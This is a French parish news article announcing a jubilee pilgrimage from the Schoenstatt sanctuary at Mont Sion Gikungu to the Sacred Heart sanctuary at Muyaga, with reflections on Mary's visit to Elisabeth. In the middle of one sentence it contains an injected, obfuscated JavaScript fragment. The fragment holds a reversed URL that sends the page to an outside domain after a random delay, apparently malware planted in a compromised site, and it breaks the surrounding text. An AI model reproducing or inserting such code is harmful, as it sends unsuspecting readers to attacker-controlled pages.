Après avoir reçu la bonne nouvelle et miracle de la part du messager de Dieu ange Gabriel qu’elle va engendrer le Sauveur du monde malgré sa petitesse, la Vierge Marie avait effectué un pèlerinage vers la région montagneuse, dans une ville de Judas. C’est chez sa cousine Elisabeth.

Elle s’y rendait en hâte pour lui annoncer les merveilles du Seigneur. Elle n’avait pas tardé à manifester son humilité en faisant un long trajet pour aller partager avec sa cousine la joie du cœur. Qui reçoit le Seigneur en lui, devient son apôtre et se presse à l’annonce de ses bienfaits.

 Voilà ce que va faire très bientôt les fidèles du Sanctuaire Marial de Schoenstatt Mont Sion Gikungu, en effectuant un pèlerinage au Sanctuaire du Sacré cœur de Jésus à Muyaga. La Vierge Pèlerine sortira du Sanctuaire et ira visiter ses enfants pour leurs partager la bonté du Seigneur.

Un seul peut mieux manifester sa gratitude mais deux ou trois le font beaucoup mieux et par excellence. C’est dans cet objectif que la Vierge Marie avait entrepris un voyage pour rendre visite à sa cousine afin qu’elle puisse se joindre à elle pour remercier le Seigneur. Ainsi va faire le Sanctuaire Marial de Schoenstatt. Ils vont annoncer aux fidèles du Sanctuaire du Sacré cœur de Jésus les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons et grâces du Seigneur par l’intercession de la Mère  Trois fois Admirable, durant tous les 25 ans de l’existence du Sanctuaire. Ils pourront alors dire comme Marie : «  le Puissant fit pour moi des merveilles ; saint est son nom. » (Luc 1,49)

Faire un pèlerinage c’est aussi manifester l’amour. La Sainte Vierge  après avoir entendu de l’ange que sa cousine est enceinte, elle était allée la voir pour l’aider dans les travaux ménagers et champêtres.

Qui effectue un pèlerinage montre aussi son l’humilité. Qu’il y a là où il est et là où il désir être dans ce chemin vers la sainteté. C’est un sacrifice fait pour manifester au Seigneur sa volonté de franchir un autre pas. Pour mériter toutes les grâces du jubilé d’argent du Sanctuaire, ce pèlerinage vers Muyaga et bien d’autres ont été organisés.

Force est de savoir que ce pèlerinage aura lieu samedi le 02 mars depuis le Mont Sion Gikungu.

 

Brigitte IRAKOZE

Laisser un commentaire